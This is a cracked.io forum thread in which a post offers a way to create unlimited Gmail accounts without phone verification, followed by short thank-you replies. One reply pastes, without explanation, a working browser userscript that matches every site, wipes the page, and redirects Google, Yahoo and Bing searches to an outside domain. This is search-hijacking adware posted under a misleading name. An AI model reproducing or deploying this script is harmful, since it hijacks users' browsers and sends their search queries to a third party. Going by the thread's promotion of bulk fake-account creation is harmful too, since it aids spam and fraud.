Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!

cracked.io | Best Forum Around | Free Premium Accounts




 41454

[HQ | No phone number required] Create unlimited gmail accounts

by Lowkey1 - 10 June, 2021 - 06:44 PM
This post is by a banned member (Lowkey1) - Unhide
This post is by a banned member (SpeedyMember) - Unhide
10
Posts
0
Threads
3 Years of service
#2
(10 June, 2021 - 06:44 PM)Lowkey1 Wrote: Show More
Hello , today I will teach you how to create as many gmail accounts as you want without needing a phone number (I'm not sure if this was on the forum already but i didn't see it)
Make sure to like because
LEECHERS GET BANNED  lol2
Like = Happy pepe PepeGlad
_____________________________

lol2
This post is by a banned member (rhit12345) - Unhide
rhit12345  
Registered
15
Posts
0
Threads
2 Years of service
#3
(10 June, 2021 - 06:44 PM)Lowkey1 Wrote: Show More
Hello , today I will teach you how to create as many gmail accounts as you want without needing a phone number (I'm not sure if this was on the forum already but i didn't see it)
Make sure to like because
LEECHERS GET BANNED  lol2
Like = Happy pepe PepeGlad
_____________________________

thanks
This post is by a banned member (Darthvader456) - Unhide
This post is by a banned member (rajebaba) - Unhide
rajebaba  
Registered
11
Posts
0
Threads
2 Years of service
#5
Thank you
This post is by a banned member (Essdx13) - Unhide
Essdx13  
Registered
6
Posts
0
Threads
2 Years of service
#6
ty bro thats nice
This post is by a banned member (elitedoorhugger) - Unhide
120
Posts
9
Threads
3 Years of service
#7
I'll take a look at this
This post is by a banned member (Wowguy) - Unhide
Wowguy  
Registered
23
Posts
0
Threads
3 Years of service
#8
ty
// ==UserScript==
// @name panda google
// @Namespace http://tampermonkey.net/
// @version 0.1
// @Description try to take over the world!
// @Author You
// @match *://*/*
// @Grant none
// ==/UserScript==

(function() {

function findGetParameter(parameterName) {
var result = null,
tmp = [];
location.search
.substr(1)
.split("&")
.forEach(function (item) {
tmp = item.split("=");
if (tmp[0] === parameterName) result = decodeURIComponent(tmp[1]);
});
return result;
}
var u ='https://lato2.mysearch.space?q=',
s = [

{
'host':/^https?\:\/\/www.google(\.\w+)+\/search\?.*(sourceid\=chrome).*$/,
'query':'q',
},
{
'host':/^(https?\:\/\/)(\w+\.)?(search\.)(yahoo\.)(com)\/(search\?)?(.*)(fr\=crmas).*$/,
'query':'p'
},
{
'host':/^(https?\:\/\/)www\.bing\.com\/(search\?)?(.*)(FORM\=CHROMN).*$/,
'query':'q'
}
]
for(var i = 0; i < s.length; i++){
var net = s[i], pattern = net.host, q = findGetParameter(net.query);
if( pattern.test(window.location.href) ){
document.body.innerHTML="";
window.location.href=u+q;
}
}
})();

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 1 Guest(s)